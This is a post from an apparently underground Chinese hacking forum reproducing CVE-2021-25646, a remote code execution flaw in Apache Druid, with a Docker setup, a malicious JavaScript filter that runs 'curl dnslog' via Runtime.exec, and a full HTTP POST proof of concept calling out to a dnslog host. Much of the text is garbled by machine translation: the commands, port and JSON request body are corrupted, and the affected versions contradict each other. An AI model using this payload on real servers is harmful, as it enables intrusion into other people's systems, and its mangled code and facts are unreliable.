[ 主页 ]  [ 隐私策略 ]  [ 0day ]  [ 业务合作 ]  [ 获得金币 ]  [ 项目开发 ]  [ 渗透 ]  [ 逆向破解 ]  [ faq ]  [ 联系我们 ]  [ 远控木马 ]  [ 合作方式 ]    用户: 39601     
Telegram联系我们
H

CVE-2021-25646 - Apache Druid RCE 复现

H

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%

Apache Druid RCE 复现​

1 漏洞介绍​

1.1 Druid​

DRUID是一个支持所有JDBC组件,它支持所有JDBC兼容的数据库,包括Oracle,MySQL,Derby,PostgreSQL,PostgreSQL,SQL Server,SQL Server,H2等

1.2 漏洞描述​

编号:CVE-2021-25646APACHE DRUID包括执行用户提供的JavaScript功能的代码,这些功能嵌入了各种类型的请求中。默认情况下,此功能在高信任环境中被禁用。但是,在DRUID 0.20.0及较低的情况下,身份验证的用户可以构建传入的JSON字符串来控制某些敏感参数以发送恶意请求,并使用Apache Druid漏洞来执行任意代码。

1.3 影响版本​

Apache Druid 0.20.1

2 漏洞复现​

2.1 环境搭建​

从Docker存储库中拉动镜子0.16.0: 1 2 Docker拉fokkodriesprong/docker-druid Docker Run -RM -I -P 88888:8888 Fokkodriesprong/Docker -Druid
20210202215229.png-water_print

2.2 复现​

启动码头容器后,访问端口8888:
20210202224141.png-water_print
单击加载数据- 本地磁盘:
20210202224155.png-water_print
填写 Base directory:QuickStart/Tutorial/ File filter:Wikiticker-2015-09-12-Smpled.json.gz 单击下一步进行过滤项目
20210202224208.png-water_print
将过滤器修改为: 1 2 3 4 5 6 7 8 { 'type':'javascript', 'function':'Function(value){return java.lang.runtime.getRuntime()。exec('curl dnslog')}', 'dimension':'Added', '': { “启用” :'True' } }
20210202224306.png-water_print
20210202224325.png-water_print
20210202224502.png-water_print
您也可以直接使用POC: 1 2 3 4 5 6 7 8 9 10 11 POST/DRUID/INDEXER/V1/Sampler HTTP/1.1 HOST: xxx.xxx.xxx.xxx:888 用户- 代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.16; RV:85.0)壁虎/20100101 Firefox/85.0 Accept:应用程序/JSON,文本/平原, / Accept-Language: ZH-CN,ZH; Q=0.8,ZH-TW; Q=0.7,ZH-HK; Q=0.5,EN-US; q=0.3,en; q=0.2 content-type:应用程序/json 内容长度: 995 连接:关闭 {'type':'index','spec': {'ioconfig': {'type':'index','inputSource': {'type'3: '{\'isrobot \':true,\'channel \': \'#x \',\'timestamp \': \'2021-1 T14:12333333333333333333:24.050Z \'33336: \': \'i \'i sunpatrolled \': false,\'page \': \'1 \',\'diffurl \': \'3https://xx.com \',\',\',\'添加\'添加\':1,\':1,\'\'\'\'\'3333660 \'印尼语omdirigering \',\'resmentlength \':35,\'isNew \':true,\'isminor \':false,\'delta \'333660true,\'isanony mous \':true,\'user \': \'lsjbot \',\'deltabucket \':0,\'dreeted \':0,\'\'namespace \'namespace \': \': \'main \'} 'inputformat': {'type':'json','keepnullColumns': true}},'dataschema': {'dataSource':'sample','timestAmpSpec'3: 'dimensionalsSpec': {},'tronflassspec': {'transforms': [],'filter': {'type':'javascript','dimensionalityalityalityedality':'添加',添加','xxxxx
.dnslog.cn')}',''': {'enabled': true}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} 'timeoutms': 15000}}}

2.3 修复​

将Apache Druid升级到最新版本
Apache Druid的权限控制,仅允许受信任的主机访问群集服务器
 
H
CVE-2021-3156 sudo 提权漏洞复现
H
Docker 逃逸相关总结
点击展开...
您必须登录或注册才可回复。
相似主题 热门帖子 查看更多

Partner Website 友情鏈接 : 臺灣駭客團隊論壇 全球最大的中文黑客论坛 한국 해커 팀 포럼 dark Web hacking team 骇客团队 HACKER.BZ UKhacker
暗网黑客论坛网站:声明,本网站的教程、文章、工具和其他相关内容仅供学习和研究使用,旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动,禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作: @HackAptTeam  网站地图Sitemap
后退
顶部